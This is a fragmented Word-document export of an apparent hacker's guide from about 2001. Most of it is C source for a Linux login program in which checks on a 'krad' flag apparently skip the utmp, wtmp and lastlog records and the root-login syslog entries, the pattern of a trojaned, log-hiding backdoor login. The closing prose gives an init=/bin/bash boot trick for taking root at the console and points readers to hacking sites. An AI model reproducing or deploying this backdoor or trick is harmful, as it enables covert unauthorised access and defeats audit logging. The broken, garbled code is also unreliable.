sizeof(ut.ut_line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ttyabbrev = ttyn + sizeof("/dev/tty") -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ncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id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time(&amp;ut.ut_ti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ncpy(ut.ut_user, username, sizeof(ut.ut_user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/* fill in host and ip-addr fields when we get networking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hostname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struct hostent *h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strncpy(ut.ut_host, hostname, sizeof(ut.ut_host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if ((he = gethostbyname(hostname))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  memcpy(&amp;ut.ut_addr, he-&gt;h_addr_list[0]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 sizeof(ut.ut_addr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utmpname(_PATH_UTMP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etutent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(krad =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pututline(&amp;u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endutent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((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) &gt;=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    flock(wtmp, LOCK_EX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    if(krad =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write(wtmp, (char *)&amp;ut, sizeof(ut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    flock(wtmp, LOCK_UN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close(wtmp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/* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS);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f(krad =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dolastlog(quietlog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!hflag) {</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t>/* XXX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atic struct winsize win = { 0, 0, 0, 0 }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ioctl(0, TIOCSWINSZ, &amp;win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chown(ttyn, pwd-&gt;pw_ui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(gr = getgrnam(TTYGRPNAME)) ? gr-&gt;gr_gid : pwd-&gt;pw_gi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chmod(ttyn, 0622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etgid(pwd-&gt;pw_gi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nitgroups(username, pwd-&gt;pw_gi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 HAVE_QUO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quota(Q_DOWARN, pwd-&gt;pw_uid, (dev_t)-1,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*pwd-&gt;pw_shell == '\0'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pwd-&gt;pw_shell = _PATH_BSHE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turn on new line discipline for the csh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lse if (!strcmp(pwd-&gt;pw_shell, _PATH_CSHELL)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octlval = NTTYDISC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ioctl(0, TIOCSETD, &amp;ioctlva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preserve TERM even without -p flag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char *e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(!((ep = getenv("TERM")) &amp;&amp; (termenv = strdup(ep)))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termenv = "dumb"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destroy environment unless user has requested preservation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!pfla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environ = (char**)malloc(sizeof(char*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memset(environ, 0, sizeof(char*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etenv("HOME", pwd-&gt;pw_dir, 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etenv("SHELL", pwd-&gt;pw_shell, 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term[0] == '\0'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ncpy(term, stypeof(tty), sizeof(term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etenv("TERM", term,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etenv("USER", pwd-&gt;pw_name, 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etenv("PATH", _PATH_DEFPATH, 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(void)setenv("HOME", pwd-&gt;pw_dir, 0);      /* legal to override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f(pwd-&gt;pw_ui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(void)setenv("PATH", _PATH_DEFPATH, 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(void)setenv("PATH", _PATH_DEFPATH_ROOT, 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etenv("SHELL", pwd-&gt;pw_shell, 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etenv("TERM", termenv, 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/* mailx will give a funny error msg if you forget this one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(void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd-&gt;pw_na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(void)setenv("MAIL",tmp,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/* LOGNAME is not documented in login(1)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HP-UX 6.5 does it. We'll not allow modifying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etenv("LOGNAME", pwd-&gt;pw_name, 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tty[sizeof("tty")-1] == 'd'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  if(krad =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syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd-&gt;pw_na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pwd-&gt;pw_uid =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if(krad =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hostnam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syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s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tty, hostna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syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty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!quietlog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uct stat s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motd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sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd-&gt;pw_na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stat(tbuf, &amp;st) == 0 &amp;&amp; st.st_size !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printf("You have %smail.\n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(st.st_mtime &gt; st.st_atime) ? "new " : "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ignal(SIGALRM, SIG_DF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ignal(SIGQUIT, SIG_DF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ignal(SIGINT, SIG_DF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ignal(SIGTSTP, SIG_IGN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ignal(SIGHUP, SIG_DF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discard permissions last so can't get killed and drop core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(setuid(pwd-&gt;pw_uid) &lt; 0 &amp;&amp; pwd-&gt;pw_uid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syslog(LOG_ALERT, "setuid() failed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exit(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wait until here to change directory!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chdir(pwd-&gt;pw_dir) &lt;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printf("No directory %s!\n", pwd-&gt;pw_dir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chdir("/")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pwd-&gt;pw_dir = "/"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printf("Logging in with home = \"/\"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if the shell field has a space: treat it like a shell script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strchr(pwd-&gt;pw_shell, ' ')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char *buff = malloc(strlen(pwd-&gt;pw_shell) + 6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if (buff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cpy(buff, "exec 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cat(buff, pwd-&gt;pw_shel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execlp("/bin/sh", "-sh", "-c", buff, (char *)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fprintf(stderr, "login: couldn't exec shell script: %s.\n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strerror(errno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fprintf(stderr, "login: no memory for shell script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buf[0] = '-'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rcpy(tbuf + 1, ((p = rindex(pwd-&gt;pw_shell, '/')) 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p + 1 : pwd-&gt;pw_shell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eclp(pwd-&gt;pw_shell, tbuf, (char *)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fprintf(stderr, "login: no shell: %s.\n", strerror(errno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loginname(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gister int ch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gister char *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atic char nbuf[UT_NAMESIZE + 1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 (;;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printf("\n%s login: ", thishost); fflush(stdou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for (p = nbuf; (ch = getchar()) != '\n'; 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if (ch == EOF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badlogin(userna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if (p &lt; nbuf + UT_NAMESIZ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*p++ = ch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p &gt; nbuf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if (nbuf[0] == '-'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(void)fprintf(stder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"login names may not start with '-'.\n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else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*p = '\0'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username = nbuf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brea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timedout(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ruct termio ti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fprintf(stderr, "Login timed out after %d seconds\n", timeou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reset echo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 ioctl(0, TCGETA, &amp;ti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i.c_lflag |= ECHO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 ioctl(0, TCSETA, &amp;ti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tterm(tty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*tty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ruct ttyent *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turn((t = getttynam(ttyn)) &amp;&amp; t-&gt;ty_status&amp;TTY_SECUR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{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nt f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char buf[100],*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nt cnt, mor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d = open(SECURETTY, O_RDONLY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f(fd &lt; 0) return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/* read each line in /etc/securetty, if a line matches our tty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n root is allowed to login on this tty, and we should retu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rue.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or(;;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 = buf; cnt = 10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hile(--cnt &gt;= 0 &amp;&amp; (more = read(fd, p, 1)) == 1 &amp;&amp; *p != '\n') p++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(more &amp;&amp; *p == '\n'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*p = '\0'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</w:t>
        <w:tab/>
        <w:t>if(!strcmp(buf, ttyn)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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>close(f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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>return 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</w:t>
        <w:tab/>
        <w:t>} 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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>continu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ab/>
        <w:t>} else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ab/>
        <w:tab/>
        <w:t>close(f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ab/>
        <w:tab/>
        <w:t>return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mp_buf motdinterrup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td(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gister int fd, nchar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void (*oldint)(), sigint(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tbuf[8192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(fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) &lt;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retur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oldint = signal(SIGINT, sigin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setjmp(motdinterrupt) =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while ((nchars = read(fd, tbuf, sizeof(tbuf))) &gt;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write(fileno(stdout), tbuf, nchars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signal(SIGINT, oldin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void)close(f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 sigint(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longjmp(motdinterrupt, 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nologin(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gister int fd, nchar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tbuf[8192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(fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) &gt;=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while ((nchars = read(fd, tbuf, sizeof(tbuf))) &gt;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write(fileno(stdout), tbuf, nchars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leepexit(0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lastlog(quie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nt quie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ruct lastlog l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nt f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(fd = open(_PATH_LASTLOG, O_RDWR, 0)) &gt;=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lseek(fd, (off_t)pwd-&gt;pw_uid * sizeof(ll), L_SE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!quiet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if (read(fd, (char *)&amp;ll, sizeof(ll)) == sizeof(ll) &amp;&am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  ll.ll_time !=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(void)printf("Last login: %.*s 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24-5, (char *)ctime(&amp;ll.ll_time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if (*ll.ll_host != '\0'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printf("from %.*s\n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 xml:space="preserve"> (int)sizeof(ll.ll_host), ll.ll_hos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printf("on %.*s\n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 xml:space="preserve"> (int)sizeof(ll.ll_line), ll.ll_lin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lseek(fd, (off_t)pwd-&gt;pw_uid * sizeof(ll), L_SET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memset((char *)&amp;ll, 0, sizeof(ll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time(&amp;ll.ll_ti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trncpy(ll.ll_line, tty, sizeof(ll.ll_line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hostnam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strncpy(ll.ll_host, hostname, sizeof(ll.ll_host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(krad =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(void)write(fd, (char *)&amp;ll, sizeof(ll)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(void)close(fd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dlogin(nam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*nam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failures =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retur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 (hostnam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yslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s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failures, failures &gt; 1 ? "S" : "", hostname, na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syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s"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failures, failures &gt; 1 ? "S" : "", tty, nam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undef</w:t>
        <w:tab/>
        <w:t>UNKN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define</w:t>
        <w:tab/>
        <w:t>UNKNOWN</w:t>
        <w:tab/>
        <w:t>"su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n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ypeof(ttyi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*ttyi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ruct ttyent *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turn(ttyid &amp;&amp; (t = getttynam(ttyid)) ? t-&gt;ty_type : UNKNOWN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endi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tty(user, tt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har *use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har *tt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ILE *f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ar buf[256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ar *pt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ar devname[50]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truct stat stb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/* no /etc/usertty, default to allow access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(!(f = fopen(_PATH_USERTTY, "r"))) retur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hile(fgets(buf, 255, f)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/* strip comments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for(ptr = buf; ptr &lt; buf + 256; ptr++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if(*ptr == '#') *ptr = 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trtok(buf, " \t"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f(strncmp(user, buf, 8) ==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while((ptr = strtok(NULL, "\t\n "))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(strncmp(tty, ptr, 10) ==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fclose(f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retur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(strcmp("PTY", ptr) ==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ifdef lin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sprintf(devname, "/dev/%s", ptr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/* VERY linux dependent, recognize PTY as ali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   for all pseudo tty's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if((stat(devname, &amp;stb) &gt;= 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   &amp;&amp; major(stb.st_rdev) == 4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   &amp;&amp; minor(stb.st_rdev) &gt;= 192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fclose(f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retur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 xml:space="preserve">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nd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/* if we get here, /etc/usertty exists, there's a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 beginning with our username, but it doesn't conta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 name of the tty where the user is trying to log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 So deny access!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fclose(f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printf("Login on %s denied.\n", tty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badlogin(user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sleepexit(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close(f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/* users not mentioned in /etc/usertty are by default allowed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on all tty's *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str(buf, cnt, er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*buf, *er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nt cn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ar ch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o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read(0, &amp;ch, sizeof(ch)) != sizeof(ch)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exit(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f (--cnt &lt; 0) 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(void)fprintf(stderr, "%s too long\r\n", err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sleepexit(1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*buf++ = ch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} while (ch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eepexit(eva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nt eva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leep((unsigned int)5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it(eval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if you really wanna have root access and have access to console, rebo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(carefully, do a ctrl-alt-del) and at lilo prompt do a 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it=/bin/bash rw (for linux 2.0.0 and above (I think)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wonder why I was speaking only about rootshell and dhp.com, ther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ts of other very good hacking pages, but these ones are updated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ickly and besides, are the best pages I kn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folks, this was i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version of my USER's GUIDE 1.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be I'll do better next time, and if I have more time, I'll add ab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(more) other exploits, remote ones, new stuff, new techniques, etc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e ya, folks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OD NIGHT !!! (it's 6.am now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MN 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GHHH! I forgot... My e-mail adress is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or now)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51:00Z</dcterms:created>
  <dc:creator>scott greenland</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>scott greenland</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2001-01-26T18:52:00Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>